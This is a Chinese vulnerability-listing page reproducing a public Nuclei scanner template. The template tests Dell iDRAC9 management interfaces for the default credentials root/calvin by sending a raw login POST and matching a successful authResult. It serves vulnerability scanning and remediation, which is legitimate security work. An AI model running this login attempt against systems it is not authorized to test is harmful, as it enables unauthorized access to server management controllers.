dell-idrac9-default-login: DELL iDRAC9 - Default Login

漏洞描述

DELL iDRAC9 default login credentials was discovered.

PoC代码[已公开]

id: dell-idrac9-default-login

info:
  name: DELL iDRAC9 - Default Login
  author: kophjager007,milo2012
  severity: high
  description: |
    DELL iDRAC9 default login credentials was discovered.
  reference:
    - https://www.dell.com/support/kbdoc/en-us/000177787/how-to-change-the-default-login-password-of-the-idrac-9
  classification:
    cwe-id: cwe-798
  metadata:
    max-request: 1
  tags: dell,idrac,default-login,vuln

http:
  - raw:
      - |
        POST /sysmgmt/2015/bmc/session HTTP/1.1
        Host: {{Hostname}}
        User: "{{username}}"
        Password: "{{password}}"

    payloads:
      username:
        - root
      password:
        - calvin
    attack: pitchfork

    matchers-condition: and
    matchers:
      - type: regex
        name: authresult
        regex:
          - '"authResult"\s*:\s*0'

      - type: status
        status:
          - 201
          - 200
# digest: 490a0046304402205c471e3c04992a1712056e0a74d45f8fc75b4b27b01ae2d399b884bce966778f022008749d741ec6b660f9744f6e94d907e6f71f6286eec6cde6ac32be6ef0c0ad11:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/default-logins/dell/dell-idrac9-default-login.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐